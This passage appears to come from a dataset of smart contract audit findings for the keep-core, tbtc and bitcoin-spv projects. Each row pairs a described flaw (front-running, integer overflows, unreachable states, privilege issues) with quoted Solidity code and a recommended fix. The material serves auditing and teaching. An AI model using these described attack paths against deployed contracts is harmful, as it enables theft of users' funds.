\\_implementation Address of the new vendor implementation contract.\\nfunction upgradeTo(address \\_implementation) public onlyOwner {\\n address currentImplementation = implementation();\\n require(\\n \\_implementation != address(0),\\n ""Implementation address can't be zero.""\\n );\\n require(\\n \\_implementation != currentImplementation,\\n ""Implementation address must be different from the current one.""\\n );\\n setImplementation(\\_implementation);\\n emit Upgraded(\\_implementation);\\n}\\n```\\n\\nRegistry\\n```\\nfunction registerFactory(address payable \\_factory) external onlyOperatorContractUpgrader {\\n require(\\_factory != address(0), ""Incorrect factory address"");\\n require(\\n registry.isApprovedOperatorContract(\\_factory),\\n ""Factory contract is not approved""\\n );\\n keepFactory = \\_factory;\\n}\\n```\\n","The underlying issue is that users of the system can't be sure what the behavior of a function call will be, and this is because the behavior can change at any time.\\nWe recommend giving the user advance notice of changes with a time lock. For example, make all upgrades require two steps with a mandatory time window between them. The first step merely broadcasts to users that a particular change is coming, and the second step commits that change after a suitable waiting period.",,"```\\n/// @notice Set the system signer fee divisor.\\n/// @param \\_signerFeeDivisor The signer fee divisor.\\nfunction setSignerFeeDivisor(uint256 \\_signerFeeDivisor)\\n external onlyOwner\\n{\\n require(\\_signerFeeDivisor > 9, ""Signer fee divisor must be greater than 9, for a signer fee that is <= 10%."");\\n signerFeeDivisor = \\_signerFeeDivisor;\\n emit SignerFeeDivisorUpdated(\\_signerFeeDivisor);\\n}\\n```\\n" +keep-core - reportRelayEntryTimeout creates an incentive for nodes to race for rewards potentially wasting gas and it creates an opportunity for front-running,high,"The incentive on `reportRelayEntryTimeout` for being rewarded with 5% of the seized amount creates an incentive to call the method but might also kick off a race for front-running this call. This method is being called from the keep node which is unlikely to adjust the gasPrice and might always lose the race against a front-running bot collecting rewards for all timeouts and fraud proofs (issue 5.7)\\n```\\n/\\*\\*\\n \\* @dev Function used to inform about the fact the currently ongoing\\n \\* new relay entry generation operation timed out. As a result, the group\\n \\* which was supposed to produce a new relay entry is immediately\\n \\* terminated and a new group is selected to produce a new relay entry.\\n \\* All members of the group are punished by seizing minimum stake of\\n \\* their tokens. The submitter of the transaction is rewarded with a\\n \\* tattletale reward which is limited to min(1, 20 / group\\_size) of the\\n \\* maximum tattletale reward.\\n \\*/\\nfunction reportRelayEntryTimeout() public {\\n require(hasEntryTimedOut(), ""Entry did not time out"");\\n groups.reportRelayEntryTimeout(signingRequest.groupIndex, groupSize, minimumStake);\\n\\n // We could terminate the last active group. If that's the case,\\n // do not try to execute signing again because there is no group\\n // which can handle it.\\n if (numberOfGroups() > 0) {\\n signRelayEntry(\\n signingRequest.relayRequestId,\\n signingRequest.previousEntry,\\n signingRequest.serviceContract,\\n signingRequest.entryVerificationAndProfitFee,\\n signingRequest.callbackFee\\n );\\n }\\n}\\n```\\n",Make sure that `reportRelayEntryTimeout` throws as early as possible if the group was previously terminated (isGroupTerminated) to avoid that keep-nodes spend gas on a call that will fail. Depending on the reward for calling out the timeout this might create a front-running opportunity that cannot be resolved.,,"```\\n/\\*\\*\\n \\* @dev Function used to inform about the fact the currently ongoing\\n \\* new relay entry generation operation timed out. As a result, the group\\n \\* which was supposed to produce a new relay entry is immediately\\n \\* terminated and a new group is selected to produce a new relay entry.\\n \\* All members of the group are punished by seizing minimum stake of\\n \\* their tokens. The submitter of the transaction is rewarded with a\\n \\* tattletale reward which is limited to min(1, 20 / group\\_size) of the\\n \\* maximum tattletale reward.\\n \\*/\\nfunction reportRelayEntryTimeout() public {\\n require(hasEntryTimedOut(), ""Entry did not time out"");\\n groups.reportRelayEntryTimeout(signingRequest.groupIndex, groupSize, minimumStake);\\n\\n // We could terminate the last active group. If that's the case,\\n // do not try to execute signing again because there is no group\\n // which can handle it.\\n if (numberOfGroups() > 0) {\\n signRelayEntry(\\n signingRequest.relayRequestId,\\n signingRequest.previousEntry,\\n signingRequest.serviceContract,\\n signingRequest.entryVerificationAndProfitFee,\\n signingRequest.callbackFee\\n );\\n }\\n}\\n```\\n" +keep-core - reportUnauthorizedSigning fraud proof is not bound to reporter and can be front-run,high,"An attacker can monitor `reportUnauthorizedSigning()` for fraud reports and attempt to front-run the original call in an effort to be the first one reporting the fraud and be rewarded 5% of the total seized amount.\\n```\\n/\\*\\*\\n \\* @dev Reports unauthorized signing for the provided group. Must provide\\n \\* a valid signature of the group address as a message. Successful signature\\n \\* verification means the private key has been leaked and all group members\\n \\* should be punished by seizing their tokens. The submitter of this proof is\\n \\* rewarded with 5% of the total seized amount scaled by the reward adjustment\\n \\* parameter and the rest 95% is burned.\\n \\*/\\nfunction reportUnauthorizedSigning(\\n uint256 groupIndex,\\n bytes memory signedGroupPubKey\\n) public {\\n groups.reportUnauthorizedSigning(groupIndex, signedGroupPubKey, minimumStake);\\n}\\n```\\n",Require the reporter to include `msg.sender` in the signature proving the fraud or implement a two-step commit/reveal scheme to counter front-running opportunities by forcing a reporter to secretly commit the fraud parameters in one block and reveal them in another.,,"```\\n/\\*\\*\\n \\* @dev Reports unauthorized signing for the provided group. Must provide\\n \\* a valid signature of the group address as a message. Successful signature\\n \\* verification means the private key has been leaked and all group members\\n \\* should be punished by seizing their tokens. The submitter of this proof is\\n \\* rewarded with 5% of the total seized amount scaled by the reward adjustment\\n \\* parameter and the rest 95% is burned.\\n \\*/\\nfunction reportUnauthorizedSigning(\\n uint256 groupIndex,\\n bytes memory signedGroupPubKey\\n) public {\\n groups.reportUnauthorizedSigning(groupIndex, signedGroupPubKey, minimumStake);\\n}\\n```\\n" +keep-core - operator contracts disabled via panic button can be re-enabled by RegistryKeeper,high,"The Registry contract defines three administrative accounts: `Governance`, `registryKeeper`, and `panicButton`. All permissions are initially assigned to the deployer when the contract is created. The account acting like a super-admin, being allowed to re-assign administrative accounts - is `Governance`. `registryKeeper` is a lower privileged account maintaining the registry and `panicButton` is an emergency account that can disable operator contracts.\\nThe keep specification states the following:\\nPanic Button The Panic Button can disable malicious or malfunctioning contracts that have been previously approved by the Registry Keeper. When a contract is disabled by the Panic Button, its status on the registry changes to reflect this, and it becomes ineligible to penalize operators. Contracts disabled by the Panic Button can not be reactivated. The Panic Button can be rekeyed by Governance.\\nIt is assumed that the permissions are `Governance` > `panicButton` > `registryKeeper`, meaning that `panicButton` should be able to overrule `registryKeeper`, while `registryKeeper` cannot overrule `panicButton`.\\nWith the current implementation of the Registry the `registryKeeper` account can re-enable an operator contract that has previously been disabled by the `panicButton` account.\\nWe would also like to note the following:\\nThe contract should use enums instead of integer literals when working with contract states.\\nChanges to the contract take effect immediately, allowing an administrative account to selectively front-run calls to the Registry ACL and interfere with user activity.\\nThe operator contract state can be set to the current value without raising an error.\\nThe panic button can be called for operator contracts that are not yet active.\\n```\\nfunction approveOperatorContract(address operatorContract) public onlyRegistryKeeper {\\n operatorContracts[operatorContract] = 1;\\n}\\n\\nfunction disableOperatorContract(address operatorContract) public onlyPanicButton {\\n operatorContracts[operatorContract] = 2;\\n}\\n```\\n","The keep specification states:\\nThe Panic Button can be used to set the status of an APPROVED contract to DISABLED. Operator Contracts disabled with the Panic Button cannot be re-enabled, and disabled contracts may not punish operators nor be selected by service contracts to perform work.\\nAll three accounts are typically trusted. We recommend requiring the `Governance` or `paniceButton` accounts to reset the contract operator state before `registryKeeper` can change the state or disallow re-enabling of disabled operator contracts as stated in the specification.",,```\\nfunction approveOperatorContract(address operatorContract) public onlyRegistryKeeper {\\n operatorContracts[operatorContract] = 1;\\n}\\n\\nfunction disableOperatorContract(address operatorContract) public onlyPanicButton {\\n operatorContracts[operatorContract] = 2;\\n}\\n```\\n +tbtc - State transitions are not always enforced,high,"A deposit follows a complex state-machine that makes sure it is correctly funded before `TBTC` Tokens are minted. The deposit lifecycle starts with a set of states modeling a funding flow that - if successful - ultimately leads to the deposit being active, meaning that corresponding `TBTC` tokens exist for the deposits. A redemption flow allows to redeem `TBTC` for `BTC` and a liquidation flow handles fraud and abort conditions. Fraud cases in the funding flow are handled separately.\\nState transitions from one deposit state to another require someone calling the corresponding transition method on the deposit and actually spend gas on it. The incentive to call a transition varies and is analyzed in more detail in the security-specification section of this report.\\nThis issue assumes that participants are not always pushing forward through the state machine as soon as a new state becomes available, opening up the possibility of having multiple state transitions being a valid option for a deposit (e.g. pushing a deposit to active state even though a timeout should have been called on it).\\nA TDT holder can choose not to call out `notifySignerSetupFailure` hoping that the signing group still forms after the signer setup timeout passes.\\nthere is no incentive for the TDT holder to terminate its own deposit after a timeout.\\nthe deposit might end up never being in a final error state.\\nthere is no incentive for the signing group to terminate the deposit.\\nThis affects all states that can time out.\\nThe deposit can be pushed to active state even after `notifySignerSetupFailure`, `notifyFundingTimeout` have passed but nobody called it out.\\nThere is no timeout check in `retrieveSignerPubkey`, `provideBTCFundingProof`.\\n```\\n/// @notice we poll the Keep contract to retrieve our pubkey\\n/// @dev We store the pubkey as 2 bytestrings, X and Y.\\n/// @param \\_d deposit storage pointer\\n/// @return True if successful, otherwise revert\\nfunction retrieveSignerPubkey(DepositUtils.Deposit storage \\_d) public {\\n require(\\_d.inAwaitingSignerSetup(), ""Not currently awaiting signer setup"");\\n\\n bytes memory \\_publicKey = IBondedECDSAKeep(\\_d.keepAddress).getPublicKey();\\n require(\\_publicKey.length == 64, ""public key not set or not 64-bytes long"");\\n```\\n\\n```\\nfunction provideBTCFundingProof(\\n DepositUtils.Deposit storage \\_d,\\n bytes4 \\_txVersion,\\n bytes memory \\_txInputVector,\\n bytes memory \\_txOutputVector,\\n bytes4 \\_txLocktime,\\n uint8 \\_fundingOutputIndex,\\n bytes memory \\_merkleProof,\\n uint256 \\_txIndexInBlock,\\n bytes memory \\_bitcoinHeaders\\n) public returns (bool) {\\n\\n require(\\_d.inAwaitingBTCFundingProof(), ""Not awaiting funding"");\\n\\n bytes8 \\_valueBytes;\\n bytes memory \\_utxoOutpoint;\\n```\\n\\nMembers of the signing group might decide to call `notifyFraudFundingTimeout` in a race to avoid late submissions for `provideFraudBTCFundingProof` to succeed in order to contain funds lost due to fraud.\\nIt should be noted that even after the fraud funding timeout passed the TDT holder could `provideFraudBTCFundingProof` as it does not check for the timeout.\\nA malicious signing group observes BTC funding on the bitcoin chain in an attempt to commit fraud at the time the `provideBTCFundingProof` transition becomes available to front-run `provideFundingECDSAFraudProof` forcing the deposit into active state.\\nThe malicious users of the signing group can then try to report fraud, set themselves as `liquidationInitiator` to be awarded part of the signer bond (in addition to taking control of the BTC collateral).\\nThe TDT holders fraud-proof can be front-run, see issue 5.15\\nIf oracle price slippage occurs for one block (flash-crash type of event) someone could call an undercollateralization transition.\\nFor severe oracle errors deposits might be liquidated by calling `notifyUndercollateralizedLiquidation`. The TDT holder cannot exit liquidation in this case.\\nFor non-severe under collateralization someone could call `notifyCourtesyCall` to impose extra effort on TDT holders to `exitCourtesyCall` deposits.\\nA deposit term expiration courtesy call can be exit in the rare case where `_d.fundedAt + TBTCConstants.getDepositTerm() == block.timestamp`\\n```\\n/// @notice Goes from courtesy call to active\\n/// @dev Only callable if collateral is sufficient and the deposit is not expiring\\n/// @param \\_d deposit storage pointer\\nfunction exitCourtesyCall(DepositUtils.Deposit storage \\_d) public {\\n require(\\_d.inCourtesyCall(), ""Not currently in courtesy call"");\\n require(block.timestamp <= \\_d.fundedAt + TBTCConstants.getDepositTerm(), ""Deposit is expiring"");\\n require(getCollateralizationPercentage(\\_d) >= \\_d.undercollateralizedThresholdPercent, ""Deposit is still undercollateralized"");\\n \\_d.setActive();\\n \\_d.logExitedCourtesyCall();\\n}\\n```\\n\\n```\\n/// @notice Notifies the contract that its term limit has been reached\\n/// @dev This initiates a courtesy call\\n/// @param \\_d deposit storage pointer\\nfunction notifyDepositExpiryCourtesyCall(DepositUtils.Deposit storage \\_d) public {\\n require(\\_d.inActive(), ""Deposit is not active"");\\n require(block.timestamp >= \\_d.fundedAt + TBTCConstants.getDepositTerm(), ""Deposit term not elapsed"");\\n \\_d.setCourtesyCall();\\n \\_d.logCourtesyCalled();\\n \\_d.courtesyCallInitiated = block.timestamp;\\n}\\n```\\n\\nAllow exiting the courtesy call only if the deposit is not expired: `block.timestamp < _d.fundedAt + TBTCConstants.getDepositTerm()`","Ensure that there are no competing interests between participants of the system to favor one transition over the other, causing race conditions, front-running opportunities or stale deposits that are not pushed to end-states.\\nNote: Please find an analysis of incentives to call state transitions in the security section of this document.",,"```\\n/// @notice we poll the Keep contract to retrieve our pubkey\\n/// @dev We store the pubkey as 2 bytestrings, X and Y.\\n/// @param \\_d deposit storage pointer\\n/// @return True if successful, otherwise revert\\nfunction retrieveSignerPubkey(DepositUtils.Deposit storage \\_d) public {\\n require(\\_d.inAwaitingSignerSetup(), ""Not currently awaiting signer setup"");\\n\\n bytes memory \\_publicKey = IBondedECDSAKeep(\\_d.keepAddress).getPublicKey();\\n require(\\_publicKey.length == 64, ""public key not set or not 64-bytes long"");\\n```\\n" +tbtc - Funder loses payment to keep if signing group is not established in time Pending,high,"To create a new deposit, the funder has to pay for the creation of a keep. If establishing the keep does not succeed in time, fails or the signing group decides not to return a public key when `retrieveSignerPubkey` is called to transition from `awaiting_signer_setup` to `awaiting_btc_funding_proof` the signer setup fails. After a timeout of 3 hrs, anyone can force the deposit to transition from `awaiting_signer_setup` to `failed_setup` by calling `notifySignerSetupFailure`.\\nThe funder had to provide payment for the keep but the signing group failed to establish. Payment for the keep is not returned even though one could assume that the signing group tried to play unfairly. The signing group might intentionally try to cause this scenario to interfere with the system.\\n`retrieveSignerPubkey` fails if keep provided pubkey is empty or of an unexpected length\\n```\\n/// @notice we poll the Keep contract to retrieve our pubkey\\n/// @dev We store the pubkey as 2 bytestrings, X and Y.\\n/// @param \\_d deposit storage pointer\\n/// @return True if successful, otherwise revert\\nfunction retrieveSignerPubkey(DepositUtils.Deposit storage \\_d) public {\\n require(\\_d.inAwaitingSignerSetup(), ""Not currently awaiting signer setup"");\\n\\n bytes memory \\_publicKey = IBondedECDSAKeep(\\_d.keepAddress).getPublicKey();\\n require(\\_publicKey.length == 64, ""public key not set or not 64-bytes long"");\\n\\n \\_d.signingGroupPubkeyX = \\_publicKey.slice(0, 32).toBytes32();\\n \\_d.signingGroupPubkeyY = \\_publicKey.slice(32, 32).toBytes32();\\n require(\\_d.signingGroupPubkeyY != bytes32(0) && \\_d.signingGroupPubkeyX != bytes32(0), ""Keep returned bad pubkey"");\\n \\_d.fundingProofTimerStart = block.timestamp;\\n\\n \\_d.setAwaitingBTCFundingProof();\\n \\_d.logRegisteredPubkey(\\n \\_d.signingGroupPubkeyX,\\n \\_d.signingGroupPubkeyY);\\n}\\n```\\n\\n`notifySignerSetupFailure` can be called by anyone after a timeout of 3hrs\\n```\\n/// @notice Anyone may notify the contract that signing group setup has timed out\\n/// @dev We rely on the keep system punishes the signers in this case\\n/// @param \\_d deposit storage pointer\\nfunction notifySignerSetupFailure(DepositUtils.Deposit storage \\_d) public {\\n require(\\_d.inAwaitingSignerSetup(), ""Not awaiting setup"");\\n require(\\n block.timestamp > \\_d.signingGroupRequestedAt + TBTCConstants.getSigningGroupFormationTimeout(),\\n ""Signing group formation timeout not yet elapsed""\\n );\\n \\_d.setFailedSetup();\\n \\_d.logSetupFailed();\\n\\n fundingTeardown(\\_d);\\n}\\n```\\n",It should be ensured that a keep group always establishes or otherwise the funder is refunded the fee for the keep.,,"```\\n/// @notice we poll the Keep contract to retrieve our pubkey\\n/// @dev We store the pubkey as 2 bytestrings, X and Y.\\n/// @param \\_d deposit storage pointer\\n/// @return True if successful, otherwise revert\\nfunction retrieveSignerPubkey(DepositUtils.Deposit storage \\_d) public {\\n require(\\_d.inAwaitingSignerSetup(), ""Not currently awaiting signer setup"");\\n\\n bytes memory \\_publicKey = IBondedECDSAKeep(\\_d.keepAddress).getPublicKey();\\n require(\\_publicKey.length == 64, ""public key not set or not 64-bytes long"");\\n\\n \\_d.signingGroupPubkeyX = \\_publicKey.slice(0, 32).toBytes32();\\n \\_d.signingGroupPubkeyY = \\_publicKey.slice(32, 32).toBytes32();\\n require(\\_d.signingGroupPubkeyY != bytes32(0) && \\_d.signingGroupPubkeyX != bytes32(0), ""Keep returned bad pubkey"");\\n \\_d.fundingProofTimerStart = block.timestamp;\\n\\n \\_d.setAwaitingBTCFundingProof();\\n \\_d.logRegisteredPubkey(\\n \\_d.signingGroupPubkeyX,\\n \\_d.signingGroupPubkeyY);\\n}\\n```\\n" +bitcoin-spv - SPV proofs do not support transactions with larger numbers of inputs and outputs Pending,high,"There is no explicit restriction on the number of inputs and outputs a Bitcoin transaction can have - as long as the transaction fits into a block. The number of inputs and outputs in a transaction is denoted by a leading “varint” - a variable length integer. In `BTCUtils.validateVin` and `BTCUtils.validateVout`, the value of this varint is restricted to under `0xFD`, or 253:\\n```\\n/// @notice Checks that the vin passed up is properly formatted\\n/// @dev Consider a vin with a valid vout in its scriptsig\\n/// @param \\_vin Raw bytes length-prefixed input vector\\n/// @return True if it represents a validly formatted vin\\nfunction validateVin(bytes memory \\_vin) internal pure returns (bool) {\\n uint256 \\_offset = 1;\\n uint8 \\_nIns = uint8(\\_vin.slice(0, 1)[0]);\\n\\n // Not valid if it says there are too many or no inputs\\n if (\\_nIns >= 0xfd || \\_nIns == 0) {\\n return false;\\n }\\n```\\n\\nTransactions that include more than 252 inputs or outputs will not pass this validation, leading to some legitimate deposits being rejected by the tBTC system.\\nThe 252-item limit exists in a few forms throughout the system, outside of the aforementioned `BTCUtils.validateVin` and BTCUtils.validateVout:\\nBTCUtils.determineOutputLength:\\n```\\n/// @notice Determines the length of an output\\n/// @dev 5 types: WPKH, WSH, PKH, SH, and OP\\_RETURN\\n/// @param \\_output The output\\n/// @return The length indicated by the prefix, error if invalid length\\nfunction determineOutputLength(bytes memory \\_output) internal pure returns (uint256) {\\n uint8 \\_len = uint8(\\_output.slice(8, 1)[0]);\\n require(\\_len < 0xfd, ""Multi-byte VarInts not supported"");\\n\\n return \\_len + 8 + 1; // 8 byte value, 1 byte for \\_len itself\\n}\\n```\\n\\nDepositUtils.findAndParseFundingOutput:\\n```\\nfunction findAndParseFundingOutput(\\n DepositUtils.Deposit storage \\_d,\\n bytes memory \\_txOutputVector,\\n uint8 \\_fundingOutputIndex\\n) public view returns (bytes8) {\\n```\\n\\nDepositUtils.validateAndParseFundingSPVProof:\\n```\\nfunction validateAndParseFundingSPVProof(\\n DepositUtils.Deposit storage \\_d,\\n bytes4 \\_txVersion,\\n bytes memory \\_txInputVector,\\n bytes memory \\_txOutputVector,\\n bytes4 \\_txLocktime,\\n uint8 \\_fundingOutputIndex,\\n bytes memory \\_merkleProof,\\n uint256 \\_txIndexInBlock,\\n bytes memory \\_bitcoinHeaders\\n) public view returns (bytes8 \\_valueBytes, bytes memory \\_utxoOutpoint){\\n```\\n\\nDepositFunding.provideFraudBTCFundingProof:\\n```\\nfunction provideFraudBTCFundingProof(\\n DepositUtils.Deposit storage \\_d,\\n bytes4 \\_txVersion,\\n bytes memory \\_txInputVector,\\n bytes memory \\_txOutputVector,\\n bytes4 \\_txLocktime,\\n uint8 \\_fundingOutputIndex,\\n bytes memory \\_merkleProof,\\n uint256 \\_txIndexInBlock,\\n bytes memory \\_bitcoinHeaders\\n) public returns (bool) {\\n```\\n\\nDepositFunding.provideBTCFundingProof:\\n```\\nfunction provideBTCFundingProof(\\n DepositUtils.Deposit storage \\_d,\\n bytes4 \\_txVersion,\\n bytes memory \\_txInputVector,\\n bytes memory \\_txOutputVector,\\n bytes4 \\_txLocktime,\\n uint8 \\_fundingOutputIndex,\\n bytes memory \\_merkleProof,\\n uint256 \\_txIndexInBlock,\\n bytes memory \\_bitcoinHeaders\\n) public returns (bool) {\\n```\\n\\nDepositLiquidation.provideSPVFraudProof:\\n```\\nfunction provideSPVFraudProof(\\n DepositUtils.Deposit storage \\_d,\\n bytes4 \\_txVersion,\\n bytes memory \\_txInputVector,\\n bytes memory \\_txOutputVector,\\n bytes4 \\_txLocktime,\\n bytes memory \\_merkleProof,\\n uint256 \\_txIndexInBlock,\\n uint8 \\_targetInputIndex,\\n bytes memory \\_bitcoinHeaders\\n) public {\\n```\\n",Resolution\\nThe client provided the following statement:\\nBenchmarks and takeaways are being tracked in issue https://github.com/keep-network/tbtc/issues/556.\\nIncorporate varint parsing in `BTCUtils.validateVin` and `BTCUtils.validateVout`. Ensure that other components of the system reflect the removal of the 252-item limit.,,"```\\n/// @notice Checks that the vin passed up is properly formatted\\n/// @dev Consider a vin with a valid vout in its scriptsig\\n/// @param \\_vin Raw bytes length-prefixed input vector\\n/// @return True if it represents a validly formatted vin\\nfunction validateVin(bytes memory \\_vin) internal pure returns (bool) {\\n uint256 \\_offset = 1;\\n uint8 \\_nIns = uint8(\\_vin.slice(0, 1)[0]);\\n\\n // Not valid if it says there are too many or no inputs\\n if (\\_nIns >= 0xfd || \\_nIns == 0) {\\n return false;\\n }\\n```\\n" +bitcoin-spv - multiple integer under-/overflows,high,"The bitcoin-spv library allows for multiple integer under-/overflows while processing or converting potentially untrusted or user-provided data.\\n`uint8` underflow `uint256(uint8(_e - 3))`\\nNote: `_header[75]` will throw consuming all gas if out of bounds while the majority of the library usually uses `slice(start, 1)` to handle this more gracefully.\\n```\\n/// @dev Target is a 256 bit number encoded as a 3-byte mantissa and 1 byte exponent\\n/// @param \\_header The header\\n/// @return The target threshold\\nfunction extractTarget(bytes memory \\_header) internal pure returns (uint256) {\\n bytes memory \\_m = \\_header.slice(72, 3);\\n uint8 \\_e = uint8(\\_header[75]);\\n uint256 \\_mantissa = bytesToUint(reverseEndianness(\\_m));\\n uint \\_exponent = \\_e - 3;\\n\\n return \\_mantissa \\* (256 \\*\\* \\_exponent);\\n}\\n```\\n\\n`uint8` overflow `uint256(uint8(_len + 8 + 1))`\\nNote: might allow a specially crafted output to return an invalid determineOutputLength <= 9.\\nNote: while type `VarInt` is implemented for inputs, it is not for the output length.\\n```\\n/// @dev 5 types: WPKH, WSH, PKH, SH, and OP\\_RETURN\\n/// @param \\_output The output\\n/// @return The length indicated by the prefix, error if invalid length\\nfunction determineOutputLength(bytes memory \\_output) internal pure returns (uint256) {\\n uint8 \\_len = uint8(\\_output.slice(8, 1)[0]);\\n require(\\_len < 0xfd, ""Multi-byte VarInts not supported"");\\n\\n return \\_len + 8 + 1; // 8 byte value, 1 byte for \\_len itself\\n}\\n```\\n\\n`uint8` underflow `uint256(uint8(extractOutputScriptLen(_output)[0]) - 2)`\\n```\\n/// @dev Determines type by the length prefix and validates format\\n/// @param \\_output The output\\n/// @return The hash committed to by the pk\\_script, or null for errors\\nfunction extractHash(bytes memory \\_output) internal pure returns (bytes memory) {\\n if (uint8(\\_output.slice(9, 1)[0]) == 0) {\\n uint256 \\_len = uint8(extractOutputScriptLen(\\_output)[0]) - 2;\\n // Check for maliciously formatted witness outputs\\n if (uint8(\\_output.slice(10, 1)[0]) != uint8(\\_len)) {\\n return hex"""";\\n }\\n return \\_output.slice(11, \\_len);\\n } else {\\n bytes32 \\_tag = \\_output.keccak256Slice(8, 3);\\n```\\n\\n`BytesLib` input validation multiple start+length overflow\\nNote: multiple occurrences. should check `start+length > start && bytes.length >= start+length`\\n```\\nfunction slice(bytes memory \\_bytes, uint \\_start, uint \\_length) internal pure returns (bytes memory res) {\\n require(\\_bytes.length >= (\\_start + \\_length), ""Slice out of bounds"");\\n```\\n\\n`BytesLib` input validation multiple start overflow\\n```\\nfunction toUint(bytes memory \\_bytes, uint \\_start) internal pure returns (uint256) {\\n require(\\_bytes.length >= (\\_start + 32), ""Uint conversion out of bounds."");\\n```\\n\\n```\\nfunction toAddress(bytes memory \\_bytes, uint \\_start) internal pure returns (address) {\\n require(\\_bytes.length >= (\\_start + 20), ""Address conversion out of bounds."");\\n```\\n\\n```\\nfunction slice(bytes memory \\_bytes, uint \\_start, uint \\_length) internal pure returns (bytes memory res) {\\n require(\\_bytes.length >= (\\_start + \\_length), ""Slice out of bounds"");\\n```\\n\\n```\\nfunction keccak256Slice(bytes memory \\_bytes, uint \\_start, uint \\_length) pure internal returns (bytes32 result) {\\n require(\\_bytes.length >= (\\_start + \\_length), ""Slice out of bounds"");\\n```\\n","We believe that a general-purpose parsing and verification library for bitcoin payments should be very strict when processing untrusted user input. With strict we mean, that it should rigorously validate provided input data and only proceed with the processing of the data if it is within a safe-to-use range for the method to return valid results. Relying on the caller to provide pre-validate data can be unsafe especially if the caller assumes that proper input validation is performed by the library.\\nGiven the risk profile for this library, we recommend a conservative approach that balances security instead of gas efficiency without relying on certain calls or instructions to throw on invalid input.\\nFor this issue specifically, we recommend proper input validation and explicit type expansion where necessary to prevent values from wrapping or processing data for arguments that are not within a safe-to-use range.",,"```\\n/// @dev Target is a 256 bit number encoded as a 3-byte mantissa and 1 byte exponent\\n/// @param \\_header The header\\n/// @return The target threshold\\nfunction extractTarget(bytes memory \\_header) internal pure returns (uint256) {\\n bytes memory \\_m = \\_header.slice(72, 3);\\n uint8 \\_e = uint8(\\_header[75]);\\n uint256 \\_mantissa = bytesToUint(reverseEndianness(\\_m));\\n uint \\_exponent = \\_e - 3;\\n\\n return \\_mantissa \\* (256 \\*\\* \\_exponent);\\n}\\n```\\n" +tbtc - Unreachable state LIQUIDATION_IN_PROGRESS,high,"According to the specification (overview, states, version 2020-02-06), a deposit can be in one of two liquidation_in_progress states.\\nLIQUIDATION_IN_PROGRESS\\nLIQUIDATION_IN_PROGRESS Liquidation due to undercollateralization or an abort has started Automatic (on-chain) liquidation was unsuccessful\\nFRAUD_LIQUIDATION_IN_PROGRESS\\nFRAUD_LIQUIDATION_IN_PROGRESS Liquidation due to fraud has started Automatic (on-chain) liquidation was unsuccessful\\nHowever, `LIQUIDATION_IN_PROGRESS` is unreachable and instead, `FRAUD_LIQUIDATION_IN_PROGRESS` is always called. This means that all non-fraud state transitions end up in the fraud liquidation path and will perform actions as if fraud was detected even though it might be caused by an undercollateralized notification or courtesy timeout.\\n`startSignerAbortLiquidation` transitions to `FRAUD_LIQUIDATION_IN_PROGRESS` on non-fraud events `notifyUndercollateralizedLiquidation` and `notifyCourtesyTimeout`\\n```\\n/// @notice Starts signer liquidation due to abort or undercollateralization\\n/// @dev We first attempt to liquidate on chain, then by auction\\n/// @param \\_d deposit storage pointer\\nfunction startSignerAbortLiquidation(DepositUtils.Deposit storage \\_d) internal {\\n \\_d.logStartedLiquidation(false);\\n // Reclaim used state for gas savings\\n \\_d.redemptionTeardown();\\n \\_d.seizeSignerBonds();\\n\\n \\_d.liquidationInitiated = block.timestamp; // Store the timestamp for auction\\n \\_d.liquidationInitiator = msg.sender;\\n \\_d.setFraudLiquidationInProgress();\\n}\\n```\\n","Verify state transitions and either remove `LIQUIDATION_IN_PROGRESS` if it is redundant or fix the state transitions for non-fraud liquidations.\\nNote that Deposit states can be simplified by removing redundant states by setting a flag (e.g. fraudLiquidation) in the deposit instead of adding a state to track the fraud liquidation path.\\nAccording to the specification, we assume the following state transitions are desired:\\n`LIQUIDATION_IN_PROGRESS`\\nIn case of liquidation due to undercollateralization or abort, the remaining bond value is split 50-50 between the account which triggered the liquidation and the signers.\\n`FRAUD_LIQUIDATION_IN_PROGRESS`\\nIn case of liquidation due to fraud, the remaining bond value in full goes to the account which triggered the liquidation by proving fraud.",,"```\\n/// @notice Starts signer liquidation due to abort or undercollateralization\\n/// @dev We first attempt to liquidate on chain, then by auction\\n/// @param \\_d deposit storage pointer\\nfunction startSignerAbortLiquidation(DepositUtils.Deposit storage \\_d) internal {\\n \\_d.logStartedLiquidation(false);\\n // Reclaim used state for gas savings\\n \\_d.redemptionTeardown();\\n \\_d.seizeSignerBonds();\\n\\n \\_d.liquidationInitiated = block.timestamp; // Store the timestamp for auction\\n \\_d.liquidationInitiator = msg.sender;\\n \\_d.setFraudLiquidationInProgress();\\n}\\n```\\n" +"tbtc - various deposit state transitions can be front-run (e.g. fraud proofs, timeouts) Won't Fix",high,"An entity that can provide proof for fraudulent ECDSA signatures or SPV proofs in the liquidation flow is rewarded with part of the deposit contract ETH value.\\nSpecification: Liquidation Any signer bond left over after the deposit owner is compensated is distributed to the account responsible for reporting the misbehavior (for fraud) or between the signers and the account that triggered liquidation (for collateralization issues).\\nHowever, the methods under which proof is provided are not protected from front-running allowing anyone to observe transactions to provideECDSAFraudProof/ `provideSPVFraudProof` and submit the same proofs with providing a higher gas value.\\nPlease note that a similar issue exists for timeout states providing rewards for calling them out (i.e. they set the `liquidationInitiator` address).\\n`provideECDSAFraudProof` verifies the fraudulent proof\\n`r,s,v,signedDigest` appear to be the fraudulent signature. `_preimage` is the correct value.\\n```\\n/// @param \\_preimage The sha256 preimage of the digest\\nfunction provideECDSAFraudProof(\\n DepositUtils.Deposit storage \\_d,\\n uint8 \\_v,\\n bytes32 \\_r,\\n bytes32 \\_s,\\n bytes32 \\_signedDigest,\\n bytes memory \\_preimage\\n) public {\\n require(\\n !\\_d.inFunding() && !\\_d.inFundingFailure(),\\n ""Use provideFundingECDSAFraudProof instead""\\n );\\n require(\\n !\\_d.inSignerLiquidation(),\\n ""Signer liquidation already in progress""\\n );\\n require(!\\_d.inEndState(), ""Contract has halted"");\\n require(submitSignatureFraud(\\_d, \\_v, \\_r, \\_s, \\_signedDigest, \\_preimage), ""Signature is not fraud"");\\n startSignerFraudLiquidation(\\_d);\\n}\\n```\\n\\n`startSignerFraudLiquidation` sets the address that provides the proof as the beneficiary\\n```\\nfunction provideFundingECDSAFraudProof(\\n DepositUtils.Deposit storage \\_d,\\n uint8 \\_v,\\n bytes32 \\_r,\\n bytes32 \\_s,\\n bytes32 \\_signedDigest,\\n bytes memory \\_preimage\\n) public {\\n require(\\n \\_d.inAwaitingBTCFundingProof(),\\n ""Signer fraud during funding flow only available while awaiting funding""\\n );\\n\\n bool \\_isFraud = \\_d.submitSignatureFraud(\\_v, \\_r, \\_s, \\_signedDigest, 